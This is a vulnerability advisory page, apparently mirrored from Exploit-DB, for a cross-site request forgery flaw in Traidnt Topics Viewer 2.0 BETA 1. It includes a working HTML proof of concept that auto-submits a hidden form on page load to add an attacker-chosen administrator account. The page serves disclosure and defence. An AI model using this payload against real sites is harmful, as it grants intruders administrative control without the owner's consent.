Traidnt Topics Viewer Cross-Site Request-Forgery Vulnerability

vendor:

Traidnt Topics Viewer

by:

thegreenhornet

7,5

CVSS

HIGH

Cross-Site Request-Forgery

352

CWE

Product Name: Traidnt Topics Viewer

Affected Version From: Traidnt Topics Viewer 2.0 BETA 1

Affected Version To: Traidnt Topics Viewer 2.0 BETA 1

Patch Exists: N/A

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2012

Traidnt Topics Viewer Cross-Site Request-Forgery Vulnerability

Traidnt Topics Viewer is prone to a cross-site request-forgery vulnerability. Exploiting this issue may allow a remote attacker to perform certain administrative actions, gain unauthorized access to the affected application, or delete certain data. Other attacks are also possible.

Mitigation:

Implementing a secure validation mechanism that enforces approved operations on the target system can help to mitigate the risk posed by this vulnerability.

Source

Exploit-DB raw data:

# source: https://www.securityfocus.com/bid/52224/info
#
# Traidnt Topics Viewer is prone to a cross-site request-forgery vulnerability.
#
# Exploiting this issue may allow a remote attacker to perform certain administrative actions, gain unauthorized access to the affected application, or delete certain data. Other attacks are also possible.
#
# Traidnt Topics Viewer 2.0 BETA 1 is vulnerable; other versions may also be affected. 
#

<html>
<body onload="javascript:document.forms[0].submit()">
<p>by:thegreenhornet</p>
<form method="POST" name="form0" action="
http://www.example.com/top/admincp/main.php?op=add-admin">
<input type="hidden" name="u_name" value="admin2"/>
<input type="hidden" name="u_m_pass" value="123456"/>
<input type="hidden" name="u_email" value="WW22@rwoot.com"/>
</form>
</body>